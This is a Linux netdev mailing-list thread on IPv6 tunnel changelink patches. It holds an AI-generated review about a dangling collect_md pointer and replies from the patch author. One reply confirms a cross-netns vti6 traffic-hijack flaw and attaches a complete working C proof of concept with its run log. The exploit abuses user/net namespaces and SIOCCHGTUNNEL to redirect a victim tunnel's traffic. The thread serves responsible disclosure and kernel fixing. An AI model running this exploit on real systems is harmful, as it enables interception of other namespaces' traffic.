This is an AI-generated review of your patch. The human sending this
email has considered the AI review valid, or at least plausible.
---
ip6_gre: Use cached t->net in ip6erspan_changelink().

This commit fixes an issue where ip6erspan_changelink() looks up the
per-netns ip6gre hash via the device's current netns (dev_net(dev)) instead
of the cached creation netns (t->net). This ensures the tunnel is relinked
into the correct hash, avoiding a stale entry and a subsequent
use-after-free during netns destruction.

> diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
> index 63fc8556b475..c5978e0bdfe3 100644
> --- a/net/ipv6/ip6_gre.c
> +++ b/net/ipv6/ip6_gre.c
> @@ -2262,7 +2262,8 @@ static int ip6erspan_changelink(struct net_device *dev, struct nlattr *tb[],
>  				struct nlattr *data[],
>  				struct netlink_ext_ack *extack)
>  {
> -	struct ip6gre_net *ign = net_generic(dev_net(dev), ip6gre_net_id);
> +	struct ip6_tnl *nt = netdev_priv(dev);
> +	struct ip6gre_net *ign = net_generic(nt->net, ip6gre_net_id);
>  	struct __ip6_tnl_parm p;
>  	struct ip6_tnl *t;

While reviewing this area, I noticed a regression further down in
ip6erspan_changelink() regarding the metadata tunnel unlinking.

If an existing ERSPAN tunnel with metadata collection enabled is modified via
a netlink changelink request to disable metadata collection, does the unlink
sequence clear the correct pointer?

Looking at the rest of ip6erspan_changelink():

    ip6gre_tunnel_unlink_md(ign, t);
    ip6gre_tunnel_unlink(ign, t);
    ip6erspan_tnl_change(t, &p, !tb[IFLA_MTU]);
    ip6erspan_tunnel_link_md(ign, t);

Because ip6gre_tunnel_unlink_md() is called instead of
ip6erspan_tunnel_unlink_md(), it evaluates the old collect_md state but
clears ign->collect_md_tun instead of ign->collect_md_tun_erspan.

This seems to leave ign->collect_md_tun_erspan pointing to the tunnel.

Since ip6erspan_tnl_change() updates the parameters to disable collect_md,
the subsequent call to ip6erspan_tunnel_link_md() will skip updating the
pointer.

When the tunnel is eventually deleted, ip6erspan_tunnel_unlink_md() would
be bypassed entirely because collect_md is now false.

Could this leave ign->collect_md_tun_erspan as a dangling pointer,
causing a use-after-free when an incoming ERSPAN packet triggers
ip6gre_tunnel_lookup() and dereferences it?
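
The sequence in question can be modelled in a few lines of userspace C.
This is only a sketch of the behaviour described in this review, not the
kernel implementation: the helper names are shortened, hypothetical
stand-ins, and assigning t->collect_md stands in for
ip6erspan_tnl_change().

```c
#include <assert.h>
#include <stddef.h>

struct tnl {
	int collect_md;
};

struct gre_net {
	struct tnl *collect_md_tun;		/* plain ip6gre metadata tunnel */
	struct tnl *collect_md_tun_erspan;	/* ERSPAN metadata tunnel */
};

/* Models the ip6gre helper: clears the non-ERSPAN pointer. */
static void gre_unlink_md(struct gre_net *ign, struct tnl *t)
{
	if (t->collect_md)
		ign->collect_md_tun = NULL;
}

/* Models the ERSPAN helper: clears the ERSPAN pointer. */
static void erspan_unlink_md(struct gre_net *ign, struct tnl *t)
{
	if (t->collect_md)
		ign->collect_md_tun_erspan = NULL;
}

/* Models the ERSPAN link helper: only acts when collect_md is set. */
static void erspan_link_md(struct gre_net *ign, struct tnl *t)
{
	if (t->collect_md)
		ign->collect_md_tun_erspan = t;
}

/* Unlink, change parameters, relink, with a pluggable unlink helper. */
static void changelink_seq(struct gre_net *ign, struct tnl *t,
			   int new_collect_md,
			   void (*unlink_md)(struct gre_net *, struct tnl *))
{
	assert(ign && t);
	unlink_md(ign, t);
	t->collect_md = new_collect_md;
	erspan_link_md(ign, t);
}
```

In this model, disabling collect_md through changelink_seq() with
gre_unlink_md leaves collect_md_tun_erspan still pointing at the tunnel,
whereas passing erspan_unlink_md clears it. Whether the real code path
is reachable in the same way still needs to be traced in the kernel
source.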


* Re: [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink().
  2026-04-30  1:18   ` Jakub Kicinski
@ 2026-04-30 10:06     ` Maoyi Xie
  0 siblings, 0 replies; 13+ messages in thread
From: Maoyi Xie @ 2026-04-30 10:06 UTC (permalink / raw)
  To: Jakub Kicinski
  Cc: netdev, kuniyu, shaw.leon, davem, edumazet, pabeni, dsahern,
	kuznet, linux-kernel, stable, security

Hi Kuniyuki, Xiao, Eric, Jakub,

Sorry for the delay, I had a fever yesterday.

Thanks for the reviews.

> Kuniyuki:
> nit: Please keep reverse xmas tree order, and you can reuse *t below.
> nit: Reported-by is not needed if it's the same as the SOB.

Both noted. v2 reuses *t and drops the Reported-by trailer.

> Xiao:
> > Fixes: 5e72ce3e3980 ...
> But why is 5e72ce3e3980 mentioned here? It neither introduced nor
> was intended to fix this bug.
> Maybe 2d665034f239 ("net: ip6_gre: Fix ip6erspan hlen calculation")
> which initially introduced ip6erspan_changelink

5e72ce3e3980 was the wrong anchor. 2d665034f239 introduced
ip6erspan_changelink with the dev_net(dev) shape. v2 uses that as the
Fixes target.

> Jakub:
> > While reviewing this area, I noticed a regression further down
> > in ip6erspan_changelink() regarding the metadata tunnel
> > unlinking.

The ip6gre_tunnel_unlink_md / ip6erspan_tunnel_unlink_md naming
asymmetry is real. Whether collect_md_tun_erspan ends up dangling and
reachable by ip6gre_tunnel_lookup() requires tracing I have not yet
done. v2 stays scoped to the dev_net conversion. The unlink_md side is
better handled in a separate patch.

v2 sent on netdev as a separate thread.

Maoyi


* Re: [PATCH net 1/2] ip6: vti: Use ip6_tnl.net in vti6_changelink().
  2026-04-30  1:18   ` Jakub Kicinski
@ 2026-05-04  5:51     ` Maoyi Xie
  0 siblings, 0 replies; 13+ messages in thread
From: Maoyi Xie @ 2026-05-04  5:51 UTC (permalink / raw)
  To: Jakub Kicinski
  Cc: netdev, kuniyu, shaw.leon, davem, edumazet, pabeni, dsahern,
	kuznet, linux-kernel, stable, security


On 4/30/26, Jakub Kicinski wrote (forwarding AI review):
> Because the collision check occurs in the new namespace (dev_net(dev)), but
> vti6_update() now modifies the original namespace's hash table (t->net),
> could an attacker in the new namespace configure their tunnel to perfectly
> match the parameters of an existing victim tunnel in the original namespace?
>
> Since the check in the new namespace finds no collision, it seems it bypasses
> the error check. Then vti6_update() prepends the attacker's tunnel
> into the original namespace's hash table, which might allow intercepting or
> hijacking traffic destined for the victim tunnel.

Confirmed empirically. PoC reproduces on a v7.0 kernel with the
posted 1/2 patch applied.

Setup:
  1. Real init_net root creates a victim tunnel "vti_victim" with
     laddr=fc00::1 raddr=fc00::a in init_net, and an attacker tunnel
     "vti_attacker" with different params (laddr=fc00::100
     raddr=fc00::200), also in init_net.
  2. fork() a child that unshare(CLONE_NEWUSER | CLONE_NEWNET) and
     becomes "root" only in its own user_ns.
  3. Real root migrates vti_attacker into the child's netns via
     "ip link set vti_attacker netns <cpid>".
  4. Child issues SIOCCHGTUNNEL on vti_attacker with new params equal
     to vti_victim's (laddr=fc00::1 raddr=fc00::a).

Result on init_net's hash for params=fc00::1/fc00::a:

    [child] SIOCCHGTUNNEL succeeded
    [parent] SIOCGETTUNNEL on init_net's ip6_vti0 with
             params=fc00::1/fc00::a returns name='vti_attacker'

So vti6_locate(init_net, victim_params, 0) now returns the attacker's
tunnel rather than the victim's. The mechanics match the review:

  - vti6_siocdevprivate runs net = dev_net(dev) = child_netns.
  - vti6_locate(child_netns, victim_params) finds nothing.
  - else branch: t = netdev_priv(attacker_dev).
  - vti6_update(t, victim_params) under the 1/2 patch operates on
    t->net = init_net:
      vti6_tnl_unlink(init_net's ip6n, t)   ; t was linked there
      vti6_tnl_change(t, victim_params)
      vti6_tnl_link(init_net's ip6n, t)     ; prepend at head
  - init_net's bucket-for-victim_params chain is now
        attacker (head) -> victim
  - Subsequent matches in init_net resolve to the attacker.

Once an inbound xfrm packet matches victim_params in init_net, the
attacker's tunnel handles rcv/xmit, with t->dev still in the child
netns. So packets destined for the victim are delivered through
the attacker's dev in a netns the attacker fully controls.

Switching vti6_siocdevprivate() to use t->net for the collision
check closes the gap. An alternative is to do the check after
vti6_update(), under the same lock that already serialises
vti6_update(). Either way this mirrors what 1/2 already does for
vti6_changelink() and vti6_update().

Happy to send a follow-up patch if you would prefer me to take it
on, or to wait for v2 of the series. Whichever works for you.

PoC source and the run output above are in poc_vti6_hijack.c and
poc_log.txt, attached.

Best regards,
Maoyi
Nanyang Technological University
https://maoyixie.com/

[-- Attachment #2: poc_log.txt --]
[-- Type: text/plain, Size: 976 bytes --]

[*] Clean prior tunnels (best effort)
[!] cmd 'ip link del vti_victim 2>/dev/null' rc=256
[!] cmd 'ip link del vti_attacker 2>/dev/null' rc=256
[*] Create victim tunnel vti_victim with laddr=fc00::1 raddr=fc00::a
[*] Create attacker tunnel vti_attacker with laddr=fc00::100 raddr=fc00::200
[child] uid=0 netns=net:[4026532261]
[parent] migrating vti_attacker to child netns (pid=417)
[child] attacker tunnel migrated to my netns
13: vti_attacker@NONE: <POINTOPOINT,NOARP> mtu 1460 qdisc noop state DOWN mode DEFAULT group default qlen 1000
[child] SIOCCHGTUNNEL: change vti_attacker params to victim's (laddr=fc00::1 raddr=fc00::a)
[child] SIOCCHGTUNNEL succeeded

[*] Verification: SIOCGETTUNNEL in init_net on params=fc00::1/fc00::a
[parent] SIOCGETTUNNEL returned tunnel name='vti_attacker'

*** HIJACK CONFIRMED: init_net's vti6 hash for params=fc00::1/fc00::a now resolves to attacker dev 'vti_attacker' (was 'vti_victim'). Cross-netns traffic-hijack window is real. ***

[-- Attachment #3: poc_vti6_hijack.c --]
[-- Type: application/octet-stream, Size: 10234 bytes --]

/*
 * PoC for the cross-netns vti6 traffic-hijack window opened by the
 * vti6_changelink()/vti6_update() fix when vti6_siocdevprivate() is
 * left using dev_net(dev) for the collision check.
 *
 * Setup (all run by real init_net root):
 *   1. Create victim vti6 tunnel V_DEV in init_net with params P_V.
 *   2. Create attacker vti6 tunnel A_DEV in init_net with DIFFERENT params P_A.
 *   3. fork() child; child unshare(CLONE_NEWUSER | CLONE_NEWNET);
 *      writes 0-mapped uid_map for fake-root in child user_ns.
 *   4. Real root migrates A_DEV into child's netns: ip link set A_DEV netns <CPID>.
 *
 * Trigger (run by child as fake-root in user_ns + child netns):
 *   5. Open AF_INET6 SOCK_DGRAM, issue SIOCCHGTUNNEL on A_DEV with params = P_V.
 *
 * On a v7.0 kernel with the patch 1/2 fix applied to vti6_update()
 * but vti6_siocdevprivate() still using dev_net(dev):
 *   - vti6_locate(net=dev_net(A_DEV)=child_netns, P_V, 0) finds nothing
 *     (V is in init_net, not child_netns).
 *   - else branch: t = netdev_priv(A_DEV) = attacker tunnel.
 *   - vti6_update(t, P_V, 0) operates on t->net = init_net:
 *       vti6_tnl_unlink(init_net's vti6_net, t)  ; t was linked there
 *       vti6_tnl_change(t, P_V)                  ; t->parms = P_V
 *       vti6_tnl_link(init_net's vti6_net, t)    ; prepend to init_net's bucket for P_V
 *     Now init_net's bucket-for-P_V chain is: [t (attacker, head)] -> [V (victim)].
 *
 * Verification (real init_net root):
 *   6. SIOCGETTUNNEL on init_net's fb_tnl_dev (ip6_vti0) with params=P_V.
 *      Kernel walks vti6_locate(init_net, P_V, 0) and returns the head of
 *      the chain. The returned name field tells us which tunnel "won":
 *         "vti_victim"   -> no hijack
 *         "vti_attacker" -> HIJACK CONFIRMED
 *
 * Build: gcc poc_vti6_hijack.c -o poc_vti6_hijack
 * Run as real root in init_net.
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <stdint.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <linux/if.h>
#include <linux/ip6_tunnel.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* SIOCDEVPRIVATE family for vti6 */
#ifndef SIOCADDTUNNEL
#define SIOCADDTUNNEL    (SIOCDEVPRIVATE + 1)
#define SIOCDELTUNNEL    (SIOCDEVPRIVATE + 2)
#define SIOCCHGTUNNEL    (SIOCDEVPRIVATE + 3)
#define SIOCGETTUNNEL    (SIOCDEVPRIVATE + 0)
#endif

#define VICTIM_NAME   "vti_victim"
#define ATTACKER_NAME "vti_attacker"

/* victim params: laddr=fc00::1, raddr=fc00::a */
static void set_victim_params(struct ip6_tnl_parm2 *p)
{
    memset(p, 0, sizeof(*p));
    inet_pton(AF_INET6, "fc00::1", &p->laddr);
    inet_pton(AF_INET6, "fc00::a", &p->raddr);
    p->proto = 0; /* unspec */
    p->encap_limit = 4;
    p->hop_limit = 64;
    p->flowinfo = 0;
    p->flags = 0;
    p->link = 0;
    p->i_key = 0;
    p->o_key = 0;
}

/* attacker params: different laddr/raddr so it lands in a different bucket */
static void set_attacker_params(struct ip6_tnl_parm2 *p)
{
    memset(p, 0, sizeof(*p));
    inet_pton(AF_INET6, "fc00::100", &p->laddr);
    inet_pton(AF_INET6, "fc00::200", &p->raddr);
    p->proto = 0;
    p->encap_limit = 4;
    p->hop_limit = 64;
}

static int run_cmd(const char *cmd)
{
    int rc = system(cmd);
    if (rc != 0)
        fprintf(stderr, "[!] cmd '%s' rc=%d\n", cmd, rc);
    return rc;
}

static int do_chg_tunnel(const char *ifname, struct ip6_tnl_parm2 *new_p)
{
    struct ifreq ifr;
    int s, rc;
    s = socket(AF_INET6, SOCK_DGRAM, 0);
    if (s < 0) { perror("socket(AF_INET6)"); return -1; }
    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, ifname, IFNAMSIZ - 1);
    ifr.ifr_ifru.ifru_data = (void *)new_p;
    /* p->name should be the device's current name; but vti6_parm_from_user
     * doesn't strictly require it. Set it just to be safe. */
    strncpy(new_p->name, ifname, IFNAMSIZ - 1);
    rc = ioctl(s, SIOCCHGTUNNEL, &ifr);
    close(s);
    return rc;
}

static int do_get_tunnel_via_fb(struct ip6_tnl_parm2 *want_p,
                                struct ip6_tnl_parm2 *out_p)
{
    /* SIOCGETTUNNEL on the fallback device "ip6_vti0" performs
     * vti6_locate(init_net, want_p, 0). */
    struct ifreq ifr;
    int s, rc;
    s = socket(AF_INET6, SOCK_DGRAM, 0);
    if (s < 0) { perror("socket(AF_INET6)"); return -1; }
    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, "ip6_vti0", IFNAMSIZ - 1);
    *out_p = *want_p;
    /* clear name field so kernel returns the tunnel's actual name */
    memset(out_p->name, 0, sizeof(out_p->name));
    ifr.ifr_ifru.ifru_data = (void *)out_p;
    rc = ioctl(s, SIOCGETTUNNEL, &ifr);
    close(s);
    return rc;
}

int main(void)
{
    int rc;
    struct ip6_tnl_parm2 victim_p, attacker_p, lookup_p;

    /* Step 1: ensure clean state */
    fprintf(stderr, "[*] Clean prior tunnels (best effort)\n");
    run_cmd("ip link del " VICTIM_NAME " 2>/dev/null");
    run_cmd("ip link del " ATTACKER_NAME " 2>/dev/null");

    /* Step 2: create victim tunnel in init_net */
    set_victim_params(&victim_p);
    fprintf(stderr, "[*] Create victim tunnel %s with laddr=fc00::1 raddr=fc00::a\n",
            VICTIM_NAME);
    rc = run_cmd("ip -6 tunnel add " VICTIM_NAME " mode vti6 "
                 "remote fc00::a local fc00::1");
    if (rc) { fprintf(stderr, "[!] failed to create victim tunnel\n"); return 2; }
    run_cmd("ip link set " VICTIM_NAME " up");

    /* Step 3: create attacker tunnel in init_net (with different params) */
    set_attacker_params(&attacker_p);
    fprintf(stderr, "[*] Create attacker tunnel %s with laddr=fc00::100 raddr=fc00::200\n",
            ATTACKER_NAME);
    rc = run_cmd("ip -6 tunnel add " ATTACKER_NAME " mode vti6 "
                 "remote fc00::200 local fc00::100");
    if (rc) { fprintf(stderr, "[!] failed to create attacker tunnel\n"); return 2; }

    /* Step 4: fork the attacker child */
    int p2c[2], c2p[2];
    if (pipe(p2c) || pipe(c2p)) { perror("pipe"); return 2; }
    pid_t cpid = fork();
    if (cpid < 0) { perror("fork"); return 2; }

    if (cpid == 0) {
        /* === CHILD === */
        close(p2c[1]); close(c2p[0]);
        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
            perror("[child] unshare(NEWUSER|NEWNET)"); _exit(2);
        }
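        char b[64]; int fd, n;
        /* Deny setgroups first; this process needs that before it may
         * write gid_map from inside the new user_ns. */
        if ((fd = open("/proc/self/setgroups", O_WRONLY)) >= 0) {
            write(fd, "deny", 4); close(fd);
        }
        /* Map uid/gid 0 in the child user_ns to uid/gid 0 in the parent.
         * Bail out if a map cannot be written, rather than continuing
         * with an unmapped identity. */
        n = snprintf(b, sizeof(b), "0 0 1\n");
        fd = open("/proc/self/uid_map", O_WRONLY);
        if (fd < 0 || write(fd, b, n) != n) { perror("[child] uid_map"); _exit(2); }
        close(fd);
        fd = open("/proc/self/gid_map", O_WRONLY);
        if (fd < 0 || write(fd, b, n) != n) { perror("[child] gid_map"); _exit(2); }
        close(fd);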

        char nsa[64]; int rl = readlink("/proc/self/ns/net", nsa, 63);
        if (rl > 0) nsa[rl] = 0;
        fprintf(stderr, "[child] uid=%u netns=%s\n", getuid(), nsa);

        /* Tell parent to migrate attacker tunnel here */
        write(c2p[1], "READY", 5);
        char tmp[8];
        read(p2c[0], tmp, sizeof(tmp));
        fprintf(stderr, "[child] attacker tunnel migrated to my netns\n");

        /* Confirm we see attacker tunnel here */
        run_cmd("ip link show " ATTACKER_NAME " 2>&1 | head -1");

        /* Issue SIOCCHGTUNNEL on attacker dev with VICTIM params */
        struct ip6_tnl_parm2 new_p;
        set_victim_params(&new_p);
        fprintf(stderr, "[child] SIOCCHGTUNNEL: change %s params to victim's "
                "(laddr=fc00::1 raddr=fc00::a)\n", ATTACKER_NAME);
        rc = do_chg_tunnel(ATTACKER_NAME, &new_p);
        if (rc < 0)
            fprintf(stderr, "[child] SIOCCHGTUNNEL rc=%d errno=%d (%s)\n",
                    rc, errno, strerror(errno));
        else
            fprintf(stderr, "[child] SIOCCHGTUNNEL succeeded\n");

        /* Tell parent we are done */
        write(c2p[1], "DONE", 4);
        /* Stay alive so attacker dev / netns persists for parent's check */
        char hold[8]; /* not named "wait", which would shadow wait(2) */
        read(p2c[0], hold, sizeof(hold));
        _exit(0);
    }

    /* === PARENT === */
    close(p2c[0]); close(c2p[1]);
    char tmp[8];
    read(c2p[0], tmp, sizeof(tmp)); /* wait for child READY */
    fprintf(stderr, "[parent] migrating %s to child netns (pid=%d)\n",
            ATTACKER_NAME, cpid);
    char migrate_cmd[128];
    snprintf(migrate_cmd, sizeof(migrate_cmd),
             "ip link set " ATTACKER_NAME " netns %d", cpid);
    rc = run_cmd(migrate_cmd);
    if (rc) { fprintf(stderr, "[parent] migration failed\n"); kill(cpid,SIGKILL); return 2; }

    write(p2c[1], "GO", 2);
    read(c2p[0], tmp, sizeof(tmp)); /* wait for child DONE */

    /* Now check init_net's hash for victim params */
    fprintf(stderr, "\n[*] Verification: SIOCGETTUNNEL in init_net on "
            "params=fc00::1/fc00::a\n");
    set_victim_params(&victim_p);
    rc = do_get_tunnel_via_fb(&victim_p, &lookup_p);
    if (rc < 0) {
        fprintf(stderr, "[parent] SIOCGETTUNNEL rc=%d errno=%d (%s)\n",
                rc, errno, strerror(errno));
    } else {
        fprintf(stderr, "[parent] SIOCGETTUNNEL returned tunnel name='%s'\n",
                lookup_p.name);
        if (strcmp(lookup_p.name, ATTACKER_NAME) == 0) {
            fprintf(stderr, "\n*** HIJACK CONFIRMED: init_net's vti6 hash for "
                    "params=fc00::1/fc00::a now resolves to attacker dev '%s' "
                    "(was '%s'). Cross-netns traffic-hijack window is real. ***\n",
                    ATTACKER_NAME, VICTIM_NAME);
        } else if (strcmp(lookup_p.name, VICTIM_NAME) == 0) {
            fprintf(stderr, "\n[OK] No hijack: init_net hash still resolves to "
                    "victim '%s'. Either the SIOCCHGTUNNEL failed, or the kernel "
                    "has a guard not visible from code reading.\n",
                    VICTIM_NAME);
        } else {
            fprintf(stderr, "\n[?] Unexpected name='%s'\n", lookup_p.name);
        }
    }

    write(p2c[1], "EXIT", 4); /* let child exit */
    int st; waitpid(cpid, &st, 0);

    /* Cleanup */
    run_cmd("ip link del " VICTIM_NAME " 2>/dev/null");
    /* attacker dev lives in the child's netns; the child has exited, so
     * it should be cleaned up automatically when that netns is torn down */

    return 0;
}


end of thread

Thread overview: 13+ messages
2026-04-28 11:07 [PATCH net 0/2] ipv6: tunnel changelink: use cached netns pointer Maoyi Xie
2026-04-28 11:07 ` [PATCH net 1/2] ip6: vti: Use ip6_tnl.net in vti6_changelink() Maoyi Xie
2026-04-28 13:14   ` Eric Dumazet
2026-04-30  1:18   ` Jakub Kicinski
2026-05-04  5:51     ` Maoyi Xie
2026-04-28 11:07 ` [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink() Maoyi Xie
2026-04-28 13:14   ` Eric Dumazet
2026-04-28 19:49   ` Kuniyuki Iwashima
2026-04-29  1:58   ` Xiao Liang
2026-04-29  2:00     ` Eric Dumazet
2026-04-29  2:38       ` Xiao Liang
2026-04-30  1:18   ` Jakub Kicinski
2026-04-30 10:06     ` Maoyi Xie
